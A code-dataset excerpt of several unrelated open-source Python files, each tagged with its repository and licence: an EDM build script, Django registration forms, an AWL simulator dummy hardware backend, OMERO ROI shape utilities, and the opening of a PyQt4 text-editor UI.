        ]
        subprocess.check_call(clone_command)
# Make the (to-be-)cloned build helpers importable, fetch them, then
# initialise the EDM-based build environment for this workspace.
sys.path.insert(0, ".devenv/buildrecipes-common")
bootstrap_devenv()
import buildcommons as common  # noqa
workspace = common.workspace()
common.edmenv_setup()
@click.group()
def cli():
    # Root click command group; subcommands register via @cli.command().
    # (Intentionally no docstring: click would surface it as help text.)
    pass
@cli.command()
def egg():
    # Build an EDM egg for this repo, then build the wrapper submodule's egg.
    common.local_repo_to_edm_egg(".", name=NAME, version=VERSION, build=BUILD)
    with common.cd("openfoam-interface/internal-interface/wrapper"):
        common.run("python edmsetup.py egg")
@cli.command()
def upload_egg():
    # Upload the egg produced by 'egg' to the EDM repository, then attempt
    # the same for the wrapper submodule (best-effort).
    egg_path = "endist/{NAME}-{VERSION}-{BUILD}.egg".format(
        NAME=NAME,
        VERSION=VERSION,
        BUILD=BUILD)
    click.echo("Uploading {} to EDM repo".format(egg_path))
    common.upload_egg(egg_path)
    with common.cd("openfoam-interface/internal-interface/wrapper"):
        try:
            common.run("python edmsetup.py upload_egg")
        except subprocess.CalledProcessError as e:
            # A failed submodule upload must not abort the main upload.
            print("Error during egg upload of submodule: {}. Continuing.".format(e))
    click.echo("Done")
@cli.command()
def clean():
    # Remove build artefacts and the bootstrap scratch area.
    click.echo("Cleaning")
    common.clean(["endist", ".devenv"])
# Dispatch the requested subcommand.
cli()
| simphony/simphony-openfoam | edmsetup.py | Python | gpl-2.0 | 1,743 |
def hello_again():
    """Print a fixed greeting to stdout."""
    greeting = "hello again"
    print(greeting)
| pdorrell/emacs-site-lisp | test/test-project/src/subdir_with_files/spaced dir name/hello.py | Python | gpl-2.0 | 45 |
"""
accounts
FILE: forms.py
Created: 6/21/15 8:31 PM
"""
__author__ = 'Mark Scrimshire:@ekivemark'
from django.conf import settings
from django import forms
from django.utils.safestring import mark_safe
from registration.forms import (RegistrationFormUniqueEmail,
RegistrationFormTermsOfService)
from accounts.models import User
class Email(forms.EmailField):
    """EmailField that lower-cases its input and rejects addresses that are
    already registered (pointing the visitor at password-reset/login)."""
    def clean(self, value):
        if settings.DEBUG:
            print("email is ", value)
        value = value.lower()
        # Keep the result of the standard EmailField validation.  The
        # original discarded super().clean()'s return value, losing any
        # normalisation it performs before the uniqueness check below.
        value = super(Email, self).clean(value)
        try:
            User.objects.get(email=value)
            raise forms.ValidationError(mark_safe(
                "This email is already registered. <br/>Use <a href='/password/reset'>this forgot password</a> link or on the <a href ='/accounts/login?next=/'>login page</a>."))
        except User.DoesNotExist:
            # No existing account: the address is available.
            if settings.DEBUG:
                print("no match on user:", value)
            return value
class UserRegistrationForm(forms.ModelForm):
    """
    A form for creating new users. Includes all the required
    fields, plus a repeated password.
    """
    # email will be become username
    email = Email()
    password1 = forms.CharField(widget=forms.PasswordInput(),
                                label="Password")
    password2 = forms.CharField(widget=forms.PasswordInput(),
                                label="Repeat your password")
    # NOTE(review): this class attribute is inert -- Django only reads
    # 'fields' from an inner Meta class.  Kept for backward compatibility
    # in case anything inspects it directly.
    fields = ['user', 'email', 'password1', 'password2' ]

    def clean_user(self):
        """
        We need to check that user is not containing spaces.
        We also need to make sure it is lower case
        :return: self
        """
        data = self.cleaned_data['user']
        # remove spaces
        data = data.replace(" ", "")
        # Convert to lowercase
        data = data.lower()
        if data == "":
            raise forms.ValidationError("User name is required")
        if settings.DEBUG:
            print("User: ", self.cleaned_data['user'], " = [", data, "]")
        return data

    def clean_password2(self):
        """Ensure both password entries match.

        Fix: this hook was previously named clean_password, which Django
        never invokes because no field is called 'password' -- so the
        password-match check silently never ran.
        """
        if self.data['password1'] != self.data['password2']:
            raise forms.ValidationError('Passwords are not the same')
        return self.data['password1']
class RegistrationFormUserTOSAndEmail(UserRegistrationForm,
                                      RegistrationFormUniqueEmail,
                                      RegistrationFormTermsOfService,
                                      ):
    # Combines the local user form with django-registration's unique-email
    # and terms-of-service validation via multiple inheritance; supplies the
    # Meta that UserRegistrationForm (a ModelForm) requires.
    class Meta:
        model = User
        fields = ['user',
                  'email',
                  'first_name',
                  'last_name']
        # exclude = ['user']
        # pass
class RegistrationFormTOSAndEmail(
        RegistrationFormUniqueEmail,
        RegistrationFormTermsOfService,
        ):
    # Plain combination of django-registration's unique-email and
    # terms-of-service forms, without the local user fields.
    pass
| ekivemark/bofhirdev | accounts/forms/other.py | Python | gpl-2.0 | 2,816 |
# -*- coding: utf-8 -*-
#
# AWL simulator - Dummy hardware interface
#
# Copyright 2013-2014 Michael Buesch <m@bues.ch>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
from __future__ import division, absolute_import, print_function, unicode_literals
from awlsim.common.compat import *
from awlsim.core.hardware import *
from awlsim.core.operators import AwlOperator
from awlsim.core.datatypes import AwlOffset
class HardwareInterface(AbstractHardwareInterface):
    """No-op hardware backend: process-image transfers do nothing, direct
    input reads are answered from the CPU's own memory, and direct output
    writes are silently accepted."""
    name = "dummy"

    def __init__(self, sim, parameters={}):
        AbstractHardwareInterface.__init__(self,
                                           sim=sim,
                                           parameters=parameters)

    def doStartup(self):
        # Nothing to initialise for the dummy backend.
        pass

    def doShutdown(self):
        # Nothing to tear down.
        pass

    def readInputs(self):
        # No hardware to read from.
        pass

    def writeOutputs(self):
        # No hardware to write to.
        pass

    def directReadInput(self, accessWidth, accessOffset):
        if accessOffset < self.inputAddressBase:
            return None
        # Answer with the CPU's current input-image value.
        operator = AwlOperator(AwlOperator.MEM_E,
                               accessWidth,
                               AwlOffset(accessOffset))
        return self.sim.cpu.fetch(operator)

    def directWriteOutput(self, accessWidth, accessOffset, data):
        if accessOffset < self.outputAddressBase:
            return False
        # Pretend the write succeeded; the data goes nowhere.
        return True
| gion86/awlsim | awlsimhw_dummy/main.py | Python | gpl-2.0 | 1,933 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# ------------------------------------------------------------------------------
# Copyright (C) 2006-2016 University of Dundee. All rights reserved.
#
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# ------------------------------------------------------------------------------
###
#
# ROIUtils allows the mapping of omero.model.ROIDataTypesI to python types
# and to create ROIDataTypesI from ROIUtil types.
# These methods also implement the acceptVisitor method linking to
# the ROIDrawingCanvas.
#
#
# @author Jean-Marie Burel
# <a href="mailto:j.burel@dundee.ac.uk">j.burel@dundee.ac.uk</a>
# @author Donald MacDonald
# <a href="mailto:donald@lifesci.dundee.ac.uk">donald@lifesci.dundee.ac.uk
# </a>
# @version 3.0
# <small>
# (<b>Internal version:</b> $Revision: $Date: $)
# </small>
# @since 3.0-Beta4
#
from omero.model.enums import UnitsLength
from omero.model import LengthI
from omero.model import EllipseI
from omero.model import LineI
from omero.model import RectangleI
from omero.model import PointI
from omero.model import PolylineI
from omero.model import PolygonI
from omero.model import MaskI
from omero.rtypes import rdouble, rint, rstring
#
# HELPERS
#
def pointsStringToXYlist(string):
    """
    Method for converting the string returned from
    omero.model.ShapeI.getPoints() into list of (x,y) points.
    Supports the legacy "points[x,y, ...] points1[...] points2[...]" layout
    as well as the newer bare "x1,y1 x2,y2 ..." layout.
    """
    chunks = string.strip().split("points")
    if len(chunks) < 2:
        # New format: whitespace-separated "x,y" pairs.
        if len(chunks) == 1 and chunks[0]:
            return [tuple(map(int, pair.split(','))) for pair in chunks[0].split()]
        msg = "Unrecognised ROI shape 'points' string: %s" % string
        raise ValueError(msg)
    # Legacy format: parse only the first "points[...]" group.
    coords = []
    for pair in chunks[1].strip(" []").split(", "):
        x, y = pair.split(",")
        coords.append((int(x.strip()), int(y.strip())))
    return coords
def xyListToBbox(xyList):
    """
    Returns a bounding box (x,y,w,h) that will contain the shape
    represented by the XY points list
    """
    # Transpose the point list into parallel x and y sequences.
    xs, ys = zip(*xyList)
    left, top = min(xs), min(ys)
    return (left, top, max(xs) - left, max(ys) - top)
#
# Data implementation
#
##
# abstract, defines the method that call it as abstract.
#
#
def abstract():
    """Raise NotImplementedError naming the calling method.

    Called from the body of a method that subclasses must override.
    """
    import inspect
    # Frame index 1 is the direct caller; element 3 is its function name.
    name = inspect.getouterframes(inspect.currentframe())[1][3]
    raise NotImplementedError("%s must be implemented in subclass" % name)
##
# ShapeSettingsData contains all the display information about
# the ROI that aggregates it.
#
class ShapeSettingsData:
    ##
    # Holds the display settings (stroke and fill) applied to an ROI shape.
    #
    ##
    # Initialises the default values of the ShapeSettings.
    # Stroke has default colour of darkGrey
    # StrokeWidth defaults to 1
    #
    def __init__(self):
        self.WHITE = 16777215
        self.BLACK = 0
        self.GREY = 11184810
        self.strokeColour = rint(self.GREY)
        self.strokeWidth = LengthI()
        self.strokeWidth.setValue(1)
        self.strokeWidth.setUnit(UnitsLength.POINT)
        self.strokeDashArray = rstring('')
        self.fillColour = rint(self.GREY)
        self.fillRule = rstring('')
    ##
    # Applies the settings in the ShapeSettingsData to the ROITypeI
    # @param shape the omero.model.ROITypeI that these settings will
    # be applied to
    #
    def setROIShapeSettings(self, shape):
        shape.setStrokeColor(self.strokeColour)
        shape.setStrokeWidth(self.strokeWidth)
        shape.setStrokeDashArray(self.strokeDashArray)
        shape.setFillColor(self.fillColour)
        shape.setFillRule(self.fillRule)
    ##
    # Set the Stroke settings of the ShapeSettings.
    # @param colour The colour of the stroke.
    # @param width The stroke width.
    #
    def setStrokeSettings(self, colour, width=1):
        self.strokeColour = rint(colour)
        self.strokeWidth = LengthI()
        self.strokeWidth.setValue(width)
        self.strokeWidth.setUnit(UnitsLength.POINT)
    ###
    # Set the Fill Settings for the ShapeSettings.
    # @param colour The fill colour of the shape (integer RGB value).
    def setFillSettings(self, colour):
        # Colours are integers: wrap in rint (not rstring) so the value
        # matches __init__ and what getFillSettings()/setFillColor() expect.
        self.fillColour = rint(colour)
    ##
    # Get the stroke settings as the tuple (strokeColour, strokeWidth).
    # @return See above.
    #
    def getStrokeSettings(self):
        return (self.strokeColour.getValue(), self.strokeWidth.getValue())
    ##
    # Get the fill setting as a tuple of (fillColour)
    # @return See above.
    #
    def getFillSettings(self):
        return (self.fillColour.getValue())
    ##
    # Get the tuple ((stokeColor, strokeWidth), (fillColour)).
    # @return see above.
    #
    def getSettings(self):
        return (self.getStrokeSettings(), self.getFillSettings())
    ##
    # Set the current shapeSettings from the ROI roi.
    # @param roi see above.
    #
    def getShapeSettingsFromROI(self, roi):
        self.strokeColour = roi.getStrokeColor()
        self.strokeWidth = roi.getStrokeWidth()
        self.strokeDashArray = roi.getStrokeDashArray()
        self.fillColour = roi.getFillColor()
        self.fillRule = roi.getFillRule()
##
# This class stores the ROI Coordinate (Z,T).
#
class ROICoordinate:
    ##
    # Initialise the ROICoordinate.
    # @param z The z-section.
    # @param t The timepoint.
    def __init__(self, z=0, t=0):
        # Values are stored as omero rtypes (rint) so they can be assigned
        # directly onto omero.model shape objects.
        self.theZ = rint(z)
        self.theT = rint(t)
    ##
    # Set the (z, t) for the roi using the (z, t) of the ROICoordinate.
    # @param roi The ROI to set the (z, t) on.
    #
    def setROICoord(self, roi):
        roi.setTheZ(self.theZ)
        roi.setTheT(self.theT)
    ##
    # Get the (z, t) from the ROI.
    # @param See above.
    #
    def setCoordFromROI(self, roi):
        self.theZ = roi.getTheZ()
        self.theT = roi.getTheT()
##
# Interface to inherit for accepting ROIDrawing as a visitor.
# @param visitor The ROIDrawingCompoent.
#
class ROIDrawingI:
    # Interface method: concrete shapes draw themselves on the visitor
    # (a ROIDrawingUtils component); the base implementation raises
    # NotImplementedError via abstract().
    def acceptVisitor(self, visitor):
        abstract()
##
# The base class for all ROIShapeData objects.
#
class ShapeData:
    ##
    # Base class for all ROI shape data objects: bundles a plane coordinate,
    # display settings and (lazily) the backing omero.model shape.
    #
    ##
    # Constructor sets up the coord, shapeSettings and roi objects.
    #
    def __init__(self):
        self.coord = ROICoordinate()
        self.shapeSettings = ShapeSettingsData()
        # Cached omero.model shape. Must be spelled "roi" (lower case):
        # getROI()/fromROI() read and write self.roi, so the previous
        # "self.ROI = None" left getROI() raising AttributeError on any
        # object that had not been through fromROI() first.
        self.roi = None
    ##
    # Set the coord of the class to coord.
    # @param See above.
    #
    def setCoord(self, coord):
        self.coord = coord
    ##
    # Set the ROICoordinate of the roi.
    # @param roi See above.
    #
    def setROICoord(self, roi):
        self.coord.setROICoord(roi)
    ##
    # Set the Geometry of the roi from the geometry in ShapeData.
    # @param roi See above.
    #
    def setROIGeometry(self, roi):
        abstract()
    ##
    # Set the Settings of the ShapeDate form the settings object.
    # @param settings See above.
    #
    def setShapeSettings(self, settings):
        self.shapeSettings = settings
    ##
    # Set the Settings of the roi from the setting in ShapeData.
    # @param roi See above.
    #
    def setROIShapeSettings(self, roi):
        self.shapeSettings.setROIShapeSettings(roi)
    ##
    # Accept visitor.
    # @param visitor See above.
    #
    def acceptVisitor(self, visitor):
        abstract()
    ##
    # Create the base type of ROI for this shape.
    #
    def createBaseType(self):
        abstract()
    ##
    # Get the roi from the ShapeData. If the roi already exists return it.
    # Otherwise create it from the ShapeData and return it.
    # @return See above.
    #
    def getROI(self):
        if(self.roi is not None):
            return self.roi
        self.roi = self.createBaseType()
        self.setROICoord(self.roi)
        self.setROIGeometry(self.roi)
        self.setROIShapeSettings(self.roi)
        return self.roi
    ##
    # Set the shape settings object from the roi.
    # @param roi see above.
    #
    def getShapeSettingsFromROI(self, roi):
        self.shapeSettings.getShapeSettingsFromROI(roi)
    ##
    # Set the ROICoordinate from the roi.
    # @param roi See above.
    #
    def getCoordFromROI(self, roi):
        self.coord.setCoordFromROI(roi)
    ##
    # Set the Geometry from the roi.
    # @param roi See above.
    #
    def getGeometryFromROI(self, roi):
        abstract()
    ##
    # Get all settings from the roi: Geometry, ShapeSettings, ROICoordinate.
    # @param roi See above.
    #
    def fromROI(self, roi):
        self.roi = roi
        self.getShapeSettingsFromROI(roi)
        self.getCoordFromROI(roi)
        self.getGeometryFromROI(roi)
##
# The EllispeData class contains all the manipulation and create of EllipseI
# types.
# It also accepts the ROIDrawingUtils visitor for drawing ellipses.
#
class EllipseData(ShapeData, ROIDrawingI):
    ##
    # Constructor for EllipseData object.
    # @param roicoord The ROICoordinate of the object (default: a new (0,0))
    # @param x The centre x coordinate of the ellipse.
    # @param y The centre y coordinate of the ellipse.
    # @param radiusX The major axis of the ellipse.
    # @param radiusY The minor axis of the ellipse.
    def __init__(self, roicoord=None, x=0, y=0, radiusX=0,
                 radiusY=0):
        ShapeData.__init__(self)
        self.x = rdouble(x)
        self.y = rdouble(y)
        self.radiusX = rdouble(radiusX)
        self.radiusY = rdouble(radiusY)
        # Create the default coordinate per instance: a ROICoordinate()
        # default argument is evaluated once at definition time and would
        # be shared (and mutated via fromROI()) by every shape.
        self.setCoord(roicoord if roicoord is not None else ROICoordinate())
    ##
    # overridden, @See ShapeData#setROIGeometry
    #
    def setROIGeometry(self, ellipse):
        ellipse.setTheZ(self.coord.theZ)
        ellipse.setTheT(self.coord.theT)
        ellipse.setX(self.x)
        ellipse.setY(self.y)
        ellipse.setRadiusX(self.radiusX)
        ellipse.setRadiusY(self.radiusY)
    ##
    # overridden, @See ShapeData#getGeometryFromROI
    #
    def getGeometryFromROI(self, roi):
        self.x = roi.getX()
        self.y = roi.getY()
        self.radiusX = roi.getRadiusX()
        self.radiusY = roi.getRadiusY()
    ##
    # overridden, @See ShapeData#createBaseType
    #
    def createBaseType(self):
        return EllipseI()
    ##
    # overridden, @See ShapeData#acceptVisitor
    #
    def acceptVisitor(self, visitor):
        visitor.drawEllipse(
            self.x.getValue(), self.y.getValue(), self.radiusX.getValue(),
            self.radiusY.getValue(), self.shapeSettings.getSettings())
##
# The RectangleData class contains all the manipulation and creation of
# RectangleI types.
# It also accepts the ROIDrawingUtils visitor for drawing rectangles.
#
class RectangleData(ShapeData, ROIDrawingI):
    ##
    # Constructor for RectangleData object.
    # @param roicoord The ROICoordinate of the object (default: a new (0,0))
    # @param x The top left x - coordinate of the shape.
    # @param y The top left y - coordinate of the shape.
    # @param width The width of the shape.
    # @param height The height of the shape.
    def __init__(self, roicoord=None, x=0, y=0, width=0, height=0):
        ShapeData.__init__(self)
        self.x = rdouble(x)
        self.y = rdouble(y)
        self.width = rdouble(width)
        self.height = rdouble(height)
        # Per-instance default coordinate (avoid a shared mutable default).
        self.setCoord(roicoord if roicoord is not None else ROICoordinate())
    ##
    # overridden, @See ShapeData#setROIGeometry
    # Named setROIGeometry so ShapeData.getROI() actually dispatches here
    # (the base class calls setROIGeometry, which previously hit the
    # abstract stub); setGeometry is kept as a backwards-compatible alias.
    #
    def setROIGeometry(self, rectangle):
        rectangle.setTheZ(self.coord.theZ)
        rectangle.setTheT(self.coord.theT)
        rectangle.setX(self.x)
        rectangle.setY(self.y)
        rectangle.setWidth(self.width)
        rectangle.setHeight(self.height)
    setGeometry = setROIGeometry
    ##
    # overridden, @See ShapeData#getGeometryFromROI
    #
    def getGeometryFromROI(self, roi):
        self.x = roi.getX()
        self.y = roi.getY()
        self.width = roi.getWidth()
        self.height = roi.getHeight()
    ##
    # overridden, @See ShapeData#createBaseType
    #
    def createBaseType(self):
        return RectangleI()
    ##
    # overridden, @See ShapeData#acceptVisitor
    #
    def acceptVisitor(self, visitor):
        # Pass plain values (not rtype wrappers) for consistency with the
        # other shape classes, which all call getValue() here.
        visitor.drawRectangle(
            self.x.getValue(), self.y.getValue(), self.width.getValue(),
            self.height.getValue(), self.shapeSettings.getSettings())
##
# The LineData class contains all the manipulation and create of LineI
# types.
# It also accepts the ROIDrawingUtils visitor for drawing lines.
#
class LineData(ShapeData, ROIDrawingI):
    ##
    # Constructor for LineData object.
    # @param roicoord The ROICoordinate of the object (default: a new (0,0))
    # @param x1 The first x coordinate of the shape.
    # @param y1 The first y coordinate of the shape.
    # @param x2 The second x coordinate of the shape.
    # @param y2 The second y coordinate of the shape.
    def __init__(self, roicoord=None, x1=0, y1=0, x2=0, y2=0):
        ShapeData.__init__(self)
        self.x1 = rdouble(x1)
        self.y1 = rdouble(y1)
        self.x2 = rdouble(x2)
        self.y2 = rdouble(y2)
        # Per-instance default coordinate (avoid a shared mutable default).
        self.setCoord(roicoord if roicoord is not None else ROICoordinate())
    ##
    # overridden, @See ShapeData#setROIGeometry
    # Named setROIGeometry so ShapeData.getROI() dispatches here;
    # setGeometry is kept as a backwards-compatible alias.
    #
    def setROIGeometry(self, line):
        line.setTheZ(self.coord.theZ)
        line.setTheT(self.coord.theT)
        line.setX1(self.x1)
        line.setY1(self.y1)
        line.setX2(self.x2)
        line.setY2(self.y2)
    setGeometry = setROIGeometry
    ##
    # overridden, @See ShapeData#getGeometryFromROI
    #
    def getGeometryFromROI(self, roi):
        self.x1 = roi.getX1()
        self.y1 = roi.getY1()
        self.x2 = roi.getX2()
        self.y2 = roi.getY2()
    ##
    # overridden, @See ShapeData#createBaseType
    #
    def createBaseType(self):
        return LineI()
    ##
    # overridden, @See ShapeData#acceptVisitor
    #
    def acceptVisitor(self, visitor):
        visitor.drawLine(
            self.x1.getValue(), self.y1.getValue(), self.x2.getValue(),
            self.y2.getValue(), self.shapeSettings.getSettings())
##
# The MaskData class contains all the manipulation and create of MaskI
# types.
# It also accepts the ROIDrawingUtils visitor for drawing masks.
#
class MaskData(ShapeData, ROIDrawingI):
    ##
    # Constructor for MaskData object.
    # @param roicoord The ROICoordinate of the object (default: a new (0,0))
    # @param bytes The mask data.
    # @param x The top left x - coordinate of the shape.
    # @param y The top left y - coordinate of the shape.
    # @param width The width of the shape.
    # @param height The height of the shape.
    def __init__(self, roicoord=None, bytes=None,
                 x=0, y=0, width=0, height=0):
        ShapeData.__init__(self)
        self.x = rdouble(x)
        self.y = rdouble(y)
        self.width = rdouble(width)
        self.height = rdouble(height)
        self.bytesdata = bytes
        # Per-instance default coordinate (avoid a shared mutable default).
        self.setCoord(roicoord if roicoord is not None else ROICoordinate())
    ##
    # overridden, @See ShapeData#setROIGeometry
    # Named setROIGeometry so ShapeData.getROI() dispatches here;
    # setGeometry is kept as a backwards-compatible alias.
    #
    def setROIGeometry(self, mask):
        mask.setTheZ(self.coord.theZ)
        mask.setTheT(self.coord.theT)
        mask.setX(self.x)
        mask.setY(self.y)
        mask.setWidth(self.width)
        mask.setHeight(self.height)
        # Fixed typo: the attribute is "bytesdata" (the old "self.bytedata"
        # raised AttributeError whenever geometry was written to a MaskI).
        mask.setBytes(self.bytesdata)
    setGeometry = setROIGeometry
    ##
    # overridden, @See ShapeData#getGeometryFromROI
    #
    def getGeometryFromROI(self, roi):
        self.x = roi.getX()
        self.y = roi.getY()
        self.width = roi.getWidth()
        self.height = roi.getHeight()
        self.bytesdata = roi.getBytes()
    ##
    # overridden, @See ShapeData#createBaseType
    #
    def createBaseType(self):
        return MaskI()
    ##
    # overridden, @See ShapeData#acceptVisitor
    #
    def acceptVisitor(self, visitor):
        visitor.drawMask(
            self.x.getValue(), self.y.getValue(),
            self.width.getValue(), self.height.getValue(),
            self.bytesdata, self.shapeSettings.getSettings())
##
# The PointData class contains all the manipulation and create of PointI
# types.
# It also accepts the ROIDrawingUtils visitor for drawing points.
#
class PointData(ShapeData, ROIDrawingI):
    ##
    # Constructor for PointData object.
    # @param roicoord The ROICoordinate of the object (default: a new (0,0))
    # @param x The x coordinate of the shape.
    # @param y The y coordinate of the shape.
    def __init__(self, roicoord=None, x=0, y=0):
        ShapeData.__init__(self)
        self.x = rdouble(x)
        self.y = rdouble(y)
        # Per-instance default coordinate (avoid a shared mutable default).
        self.setCoord(roicoord if roicoord is not None else ROICoordinate())
    ##
    # overridden, @See ShapeData#setROIGeometry
    # Named setROIGeometry so ShapeData.getROI() dispatches here;
    # setGeometry is kept as a backwards-compatible alias.
    #
    def setROIGeometry(self, point):
        point.setTheZ(self.coord.theZ)
        point.setTheT(self.coord.theT)
        point.setX(self.x)
        point.setY(self.y)
    setGeometry = setROIGeometry
    ##
    # overridden, @See ShapeData#getGeometryFromROI
    #
    def getGeometryFromROI(self, roi):
        self.x = roi.getX()
        self.y = roi.getY()
    ##
    # overridden, @See ShapeData#createBaseType
    #
    def createBaseType(self):
        return PointI()
    ##
    # overridden, @See ShapeData#acceptVisitor
    # A point is rendered as a small fixed-size (3x3) ellipse.
    #
    def acceptVisitor(self, visitor):
        visitor.drawEllipse(
            self.x.getValue(), self.y.getValue(), 3, 3,
            self.shapeSettings.getSettings())
##
# The PolygonData class contains all the manipulation and create of PolygonI
# types.
# It also accepts the ROIDrawingUtils visitor for drawing polygons.
#
class PolygonData(ShapeData, ROIDrawingI):
    ##
    # Constructor for PolygonData object.
    # @param roicoord The ROICoordinate of the object (default: a new (0,0))
    # @param pointsList The list of points that make up the polygon,
    # as pairs [x1, y1, x2, y2 ..].
    def __init__(self, roicoord=None, pointsList=(0, 0)):
        ShapeData.__init__(self)
        self.points = rstring(self.listToString(pointsList))
        # Per-instance default coordinate (avoid a shared mutable default).
        self.setCoord(roicoord if roicoord is not None else ROICoordinate())
    ##
    # overridden, @See ShapeData#setROIGeometry
    # Named setROIGeometry so ShapeData.getROI() dispatches here;
    # setGeometry is kept as a backwards-compatible alias.
    #
    def setROIGeometry(self, polygon):
        polygon.setTheZ(self.coord.theZ)
        polygon.setTheT(self.coord.theT)
        polygon.setPoints(self.points)
    setGeometry = setROIGeometry
    ##
    # overridden, @See ShapeData#getGeometryFromROI
    #
    def getGeometryFromROI(self, roi):
        self.points = roi.getPoints()
    ##
    # Convert a pointsList[x1,y1,x2,y2..] to a comma separated string.
    # @param pointsList The list of points to convert.
    # @return The pointsList converted to a string.
    def listToString(self, pointsList):
        return ','.join(str(element) for element in pointsList)
    ##
    # Convert a string of points to a tuple list [(x1,y1),(x2,y2)..].
    # @param pointString The string to convert.
    # @return The tuple list converted from a string.
    def stringToTupleList(self, pointString):
        # Avoid shadowing the builtin "list"; // keeps integer semantics
        # under both Python 2 and Python 3.
        tokens = pointString.split(',')
        return [(int(tokens[i * 2]), int(tokens[i * 2 + 1]))
                for i in range(len(tokens) // 2)]
    ##
    # overridden, @See ShapeData#createBaseType
    #
    def createBaseType(self):
        return PolygonI()
    ##
    # overridden, @See ShapeData#acceptVisitor
    #
    def acceptVisitor(self, visitor):
        visitor.drawPolygon(self.stringToTupleList(
            self.points.getValue()), self.shapeSettings.getSettings())
##
# The PolylineData class contains all the manipulation and create of PolylineI
# types.
# It also accepts the ROIDrawingUtils visitor for drawing polylines.
#
class PolylineData(ShapeData, ROIDrawingI):
    ##
    # Constructor for PolylineData object.
    # @param roicoord The ROICoordinate of the object (default: a new (0,0))
    # @param pointsList The list of points that make up the polyline,
    # as pairs [x1, y1, x2, y2 ..].
    def __init__(self, roicoord=None, pointsList=(0, 0)):
        ShapeData.__init__(self)
        self.points = rstring(self.listToString(pointsList))
        # Per-instance default coordinate (avoid a shared mutable default).
        self.setCoord(roicoord if roicoord is not None else ROICoordinate())
    ##
    # overridden, @See ShapeData#setROIGeometry
    # Named setROIGeometry so ShapeData.getROI() dispatches here;
    # setGeometry is kept as a backwards-compatible alias.
    #
    def setROIGeometry(self, polyline):
        polyline.setTheZ(self.coord.theZ)
        polyline.setTheT(self.coord.theT)
        polyline.setPoints(self.points)
    setGeometry = setROIGeometry
    ##
    # overridden, @See ShapeData#getGeometryFromROI
    #
    def getGeometryFromROI(self, roi):
        self.points = roi.getPoints()
    ##
    # Convert a pointsList[x1,y1,x2,y2..] to a comma separated string.
    # @param pointsList The list of points to convert.
    # @return The pointsList converted to a string.
    def listToString(self, pointsList):
        return ','.join(str(element) for element in pointsList)
    ##
    # Convert a string of points to a tuple list [(x1,y1),(x2,y2)..].
    # @param pointString The string to convert.
    # @return The tuple list converted from a string.
    def stringToTupleList(self, pointString):
        # Avoid shadowing the builtin "list"; // keeps integer semantics
        # under both Python 2 and Python 3.
        tokens = pointString.split(',')
        return [(int(tokens[i * 2]), int(tokens[i * 2 + 1]))
                for i in range(len(tokens) // 2)]
    ##
    # overridden, @See ShapeData#createBaseType
    #
    def createBaseType(self):
        return PolylineI()
    ##
    # overridden, @See ShapeData#acceptVisitor
    #
    def acceptVisitor(self, visitor):
        visitor.drawPolyline(self.stringToTupleList(
            self.points.getValue()), self.shapeSettings.getSettings())
| dpwrussell/openmicroscopy | components/tools/OmeroPy/src/omero/util/ROI_utils.py | Python | gpl-2.0 | 22,495 |
# -*- coding: utf-8 -*-
#Ege Öz
from PyQt4 import QtCore, QtGui
import sys,os
try:
    # PyQt4 API v1: QString exists and provides an explicit UTF-8 converter.
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    # API v2 / newer bindings: plain str is already unicode -- identity shim.
    def _fromUtf8(s):
        return s
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    # Newer Qt dropped the encoding argument from translate().
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
    """Main window UI and file handlers for the TextPad editor (PyQt4)."""

    def setupUi(self, MainWindow):
        """Build widgets, menus and actions, and wire up the signals."""
        # No file is associated with the buffer until Open or Save As is
        # used; kaydet() (Save) checks this and falls back to Save As.
        self.afilename = None
        MainWindow.setObjectName(_fromUtf8("MainWindow"))
        MainWindow.resize(661, 440)
        icon = QtGui.QIcon.fromTheme(_fromUtf8("text"))
        MainWindow.setWindowIcon(icon)
        self.centralwidget = QtGui.QWidget(MainWindow)
        self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
        self.gridLayout = QtGui.QGridLayout(self.centralwidget)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        self.textEdit = QtGui.QTextEdit(self.centralwidget)
        self.textEdit.setObjectName(_fromUtf8("textEdit"))
        font = QtGui.QFont()
        font.setFamily(_fromUtf8("Monospace"))
        self.textEdit.setFont(font)
        self.gridLayout.addWidget(self.textEdit, 0, 0, 1, 1)
        MainWindow.setCentralWidget(self.centralwidget)
        self.menubar = QtGui.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 661, 20))
        self.menubar.setObjectName(_fromUtf8("menubar"))
        self.menuFile = QtGui.QMenu(self.menubar)
        self.menuFile.setObjectName(_fromUtf8("menuFile"))
        self.menuHelp = QtGui.QMenu(self.menubar)
        self.menuHelp.setObjectName(_fromUtf8("menuHelp"))
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtGui.QStatusBar(MainWindow)
        self.statusbar.setObjectName(_fromUtf8("statusbar"))
        MainWindow.setStatusBar(self.statusbar)
        self.actionNew = QtGui.QAction(MainWindow)
        self.actionNew.setObjectName(_fromUtf8("actionNew"))
        self.actionOpen = QtGui.QAction(MainWindow)
        self.actionOpen.setObjectName(_fromUtf8("actionOpen"))
        self.actionSave = QtGui.QAction(MainWindow)
        self.actionSave.setObjectName(_fromUtf8("actionSave"))
